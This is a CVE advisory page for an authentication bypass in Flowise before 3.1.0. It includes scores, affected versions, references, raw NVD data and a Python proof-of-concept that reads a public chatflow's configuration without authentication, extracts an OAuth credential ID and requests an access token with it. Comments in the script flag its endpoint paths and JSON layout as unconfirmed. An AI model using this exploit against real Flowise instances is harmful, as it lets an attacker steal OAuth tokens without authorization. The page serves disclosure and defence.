Security Vulnerability Report
CVE-2026-41273 CVSS 8.2 HIGH

CVE-2026-41273

Published: 2026-04-23 20:16:16
Last Modified: 2026-04-24 19:17:12

Description

Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, Flowise contains an authentication bypass vulnerability that allows an unauthenticated attacker to obtain OAuth 2.0 access tokens associated with a public chatflow. By accessing a public chatflow configuration endpoint, an attacker can retrieve internal workflow data, including OAuth credential identifiers, which can then be used to refresh and obtain valid OAuth 2.0 access tokens without authentication. This vulnerability is fixed in 3.1.0.

CVSS Details

CVSS Score
8.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:flowiseai:flowise:*:*:*:*:*:*:*:* - VULNERABLE
Flowise < 3.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
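# Proof-of-concept as published for CVE-2026-41273 (Flowise < 3.1.0, fixed in 3.1.0).
# It models the flow in the CVE description: an unauthenticated read of a public
# chatflow's configuration exposes an OAuth credential identifier, and a token
# request naming that identifier is then answered without authentication.
#
# NOTE(review): the JSON layout walked below is labelled a "structure simulation"
# by its author, and the endpoint paths are as given on this page; neither is
# confirmed here against the vendor advisory (GHSA-6f7g-v4pp-r667).
#
# Defenders: the fix is upgrading to 3.1.0. On older instances, review which
# chatflows are public and which OAuth credentials their nodes reference, and
# treat those credentials as potentially exposed.
import requests
import json  # not used below; kept as published

# Target configuration (placeholders: a local lab instance and a dummy chatflow id)
target_url = "http://localhost:3000"
public_chatflow_id = "public-uuid-here"

# Bound every request so the check cannot hang on an unresponsive host.
REQUEST_TIMEOUT = 10

# Step 1: Access the public chatflow configuration endpoint
# This endpoint leaks internal workflow data including OAuth credential identifiers
config_endpoint = f"{target_url}/api/v1/chatflows/{public_chatflow_id}"

print(f"[*] Attempting to access configuration endpoint: {config_endpoint}")

try:
    response = requests.get(config_endpoint, timeout=REQUEST_TIMEOUT)

    if response.status_code == 200:
        data = response.json()
        print("[+] Successfully retrieved chatflow configuration.")

        # Step 2: Extract OAuth Credential ID from the response
        # Structure simulation: nodes -> data -> credentials -> id
        oauth_cred_id = None

        # Walk the nodes and stop at the first one that carries a credentials
        # entry (as published; later nodes are not inspected).
        if 'nodes' in data:
            for node in data['nodes']:
                if 'data' in node and 'credentials' in node['data']:
                    oauth_cred_id = node['data']['credentials'].get('id')
                    break

        if oauth_cred_id:
            print(f"[+] Found OAuth Credential ID: {oauth_cred_id}")

            # Step 3: Use Credential ID to obtain/refresh OAuth 2.0 Access Token
            # The request carries no session or API key; a 200 here is the
            # missing-authentication condition the CVE describes (CWE-306).
            token_endpoint = f"{target_url}/api/v1/oauth/token"
            payload = {
                "credentialId": oauth_cred_id,
                "grantType": "refresh_token"
            }

            token_resp = requests.post(
                token_endpoint, json=payload, timeout=REQUEST_TIMEOUT
            )

            if token_resp.status_code == 200:
                token_data = token_resp.json()
                print("[!] Exploit Successful!")
                # A live bearer token must not end up in terminal scrollback or
                # CI logs: report only whether one was issued, never its value.
                token_issued = bool(token_data.get('access_token'))
                print(f"[+] Access token present in response: {token_issued} (value withheld)")
            else:
                print("[-] Failed to obtain token using the credential ID.")
        else:
            print("[-] No OAuth credentials found in the configuration.")
    else:
        print(f"[-] Failed to access endpoint. Status code: {response.status_code}")

except Exception as e:
    # Top-level boundary of a one-shot script: report the failure and exit.
    print(f"Error during exploitation: {e}")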

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41273", "sourceIdentifier": "[email protected]", "published": "2026-04-23T20:16:15.973", "lastModified": "2026-04-24T19:17:11.530", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, Flowise contains an authentication bypass vulnerability that allows an unauthenticated attacker to obtain OAuth 2.0 access tokens associated with a public chatflow. By accessing a public chatflow configuration endpoint, an attacker can retrieve internal workflow data, including OAuth credential identifiers, which can then be used to refresh and obtain valid OAuth 2.0 access tokens without authentication. This vulnerability is fixed in 3.1.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": 
"NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:flowiseai:flowise:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.1.0", "matchCriteriaId": "CB30DB8F-4F72-4FD3-90FB-8331F1CBB78E"}]}]}], "references": [{"url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-6f7g-v4pp-r667", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-6f7g-v4pp-r667", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}